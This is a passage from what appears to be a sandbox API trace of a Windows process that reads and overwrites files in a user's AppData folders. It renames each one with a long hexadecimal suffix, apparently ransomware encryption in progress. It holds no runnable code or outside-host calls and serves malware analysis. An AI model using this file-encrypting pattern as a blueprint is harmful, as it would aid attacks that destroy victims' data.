lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.094] WriteFile (in: hFile=0x324, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0116.095] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.330] ReadFile (in: hFile=0x33c, lpBuffer=0x32e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c81a0) returned 1 [0116.330] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.334] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x32c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x32c8250, ReturnLength=0x27fff70) returned 0x0 [0116.335] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbtmp.log", lpString2=".87E4AB4E4653D24995155AD8740FDAA34AA64FBEC1209F2099B4B6E2C586657B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbtmp.log.87E4AB4E4653D24995155AD8740FDAA34AA64FBEC1209F2099B4B6E2C586657B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbtmp.log.87E4AB4E4653D24995155AD8740FDAA34AA64FBEC1209F2099B4B6E2C586657B" [0116.335] GetProcessHeap () returned 0x600000 [0116.335] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x21c) returned 0x6b0360 [0116.335] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x27fff60, FileInformation=0x6b0360, Length=0x21c, FileInformationClass=0xa) returned 0x0 [0116.336] CloseHandle (hObject=0x33c) returned 1 [0116.336] GetProcessHeap () returned 0x600000 [0116.336] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0116.338] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.380] WriteFile (in: hFile=0x318, lpBuffer=0x32c0180, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 0x0 [0116.380] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.381] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x27fff70) returned 0x0 [0116.381] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat", lpString2=".436620A1E2E14CA3BC685ED98857459406445B6139520CC46AA296BE91845030" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat.436620A1E2E14CA3BC685ED98857459406445B6139520CC46AA296BE91845030") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat.436620A1E2E14CA3BC685ED98857459406445B6139520CC46AA296BE91845030" [0116.381] GetProcessHeap () returned 0x600000 [0116.381] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x230) returned 0x3162b70 [0116.381] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x27fff60, FileInformation=0x3162b70, Length=0x230, FileInformationClass=0xa) returned 0x0 [0116.382] CloseHandle (hObject=0x318) returned 1 [0116.383] GetProcessHeap () returned 0x600000 [0116.383] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0116.383] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.385] ReadFile (in: hFile=0x318, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 1 [0116.385] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.456] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.469] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.547] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x27fff70) returned 0x0 [0116.548] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".23C7FF009A523D8870AC274A9B57D5E07BE4AD5ABD8DCC775BEE62F3D6BA8E54" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.23C7FF009A523D8870AC274A9B57D5E07BE4AD5ABD8DCC775BEE62F3D6BA8E54") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.23C7FF009A523D8870AC274A9B57D5E07BE4AD5ABD8DCC775BEE62F3D6BA8E54" [0116.548] GetProcessHeap () returned 0x600000 [0116.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x252) returned 0x6345a8 [0116.548] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x27fff60, FileInformation=0x6345a8, Length=0x252, FileInformationClass=0xa) returned 0x0 [0116.549] CloseHandle (hObject=0x214) returned 1 [0116.550] GetProcessHeap () returned 0x600000 [0116.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.552] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.632] WriteFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0116.642] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.650] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0116.650] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".6B0A4095BAB517CCFFD6A683E85583A88F42EA8C278376D028E0E76A1BC26636" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat.6B0A4095BAB517CCFFD6A683E85583A88F42EA8C278376D028E0E76A1BC26636") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat.6B0A4095BAB517CCFFD6A683E85583A88F42EA8C278376D028E0E76A1BC26636" [0116.650] GetProcessHeap () returned 0x600000 [0116.650] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a4) returned 0x6349c0 [0116.650] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x27fff60, FileInformation=0x6349c0, Length=0x1a4, FileInformationClass=0xa) returned 0x0 [0116.651] CloseHandle (hObject=0x214) returned 1 [0116.652] GetProcessHeap () returned 0x600000 [0116.652] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.653] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.696] ReadFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.696] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.697] WriteFile (in: hFile=0x214, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.699] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.700] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0116.700] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".8E930573651D8A341F4D00FD8C9440C113143D34F69F1E632051811CF873AB28" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat.8E930573651D8A341F4D00FD8C9440C113143D34F69F1E632051811CF873AB28") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\Settings\\settings.dat.8E930573651D8A341F4D00FD8C9440C113143D34F69F1E632051811CF873AB28" [0116.700] GetProcessHeap () returned 0x600000 [0116.700] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a4) returned 0x634b70 [0116.700] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x27fff60, FileInformation=0x634b70, Length=0x1a4, FileInformationClass=0xa) returned 0x0 [0116.702] CloseHandle (hObject=0x214) returned 1 [0116.705] GetProcessHeap () returned 0x600000 [0116.705] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.706] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.770] ReadFile (in: hFile=0x320, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.771] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.775] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0116.775] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".9FA1B9CC326D6877DDBE906FA374350488A05D82FEB54346E8EC0A55AE7C8662" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat.9FA1B9CC326D6877DDBE906FA374350488A05D82FEB54346E8EC0A55AE7C8662") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat.9FA1B9CC326D6877DDBE906FA374350488A05D82FEB54346E8EC0A55AE7C8662" [0116.775] GetProcessHeap () returned 0x600000 [0116.775] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a0) returned 0x6b0b08 [0116.775] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x27fff60, FileInformation=0x6b0b08, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0116.776] CloseHandle (hObject=0x320) returned 1 [0116.776] GetProcessHeap () returned 0x600000 [0116.776] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.777] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.828] ReadFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.830] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.830] WriteFile (in: hFile=0x214, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0116.833] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.841] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x27fff70) returned 0x0 [0116.842] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".89F8FD44BC8B306A1248471AD0653C3D9D33C8C78E56E691291EBFEB30EE7227" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat.89F8FD44BC8B306A1248471AD0653C3D9D33C8C78E56E691291EBFEB30EE7227") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\Settings\\settings.dat.89F8FD44BC8B306A1248471AD0653C3D9D33C8C78E56E691291EBFEB30EE7227" [0116.842] GetProcessHeap () returned 0x600000 [0116.842] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a0) returned 0x6b0cb0 [0116.842] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x27fff60, FileInformation=0x6b0cb0, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0116.843] CloseHandle (hObject=0x214) returned 1 [0116.843] GetProcessHeap () returned 0x600000 [0116.843] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.845] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.887] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0116.887] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0116.888] WriteFile (in: hFile=0x214, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.890] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0118.200] WriteFile (in: hFile=0x320, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0118.239] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0118.938] ReadFile (in: hFile=0x328, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x3800, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 1 [0118.938] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0118.938] WriteFile (in: hFile=0x328, lpBuffer=0x32c0180, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 0x0 [0118.939] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0118.940] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x27fff70) returned 0x0 [0118.940] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2=".8EA00C760B453527D0535725218656AD13137C62B24B5DB7040E930B8187E211" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt.8EA00C760B453527D0535725218656AD13137C62B24B5DB7040E930B8187E211") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt.8EA00C760B453527D0535725218656AD13137C62B24B5DB7040E930B8187E211" [0118.940] GetProcessHeap () returned 0x600000 [0118.940] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x240) returned 0x624a30 [0118.941] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x27fff60, FileInformation=0x624a30, Length=0x240, FileInformationClass=0xa) returned 0x0 [0118.943] CloseHandle (hObject=0x328) returned 1 [0118.943] GetProcessHeap () returned 0x600000 [0118.943] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0118.943] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0119.140] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 0x0 [0119.142] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0119.147] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x27fff70) returned 0x0 [0119.148] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2=".C3A20088D08B77D09DE998723CFEF47F82F050B9767D31F57235762FB9F39C63" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt.C3A20088D08B77D09DE998723CFEF47F82F050B9767D31F57235762FB9F39C63") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt.C3A20088D08B77D09DE998723CFEF47F82F050B9767D31F57235762FB9F39C63" [0119.148] GetProcessHeap () returned 0x600000 [0119.148] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x23e) returned 0x31854d8 [0119.148] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x27fff60, FileInformation=0x31854d8, Length=0x23e, FileInformationClass=0xa) returned 0x0 [0119.149] 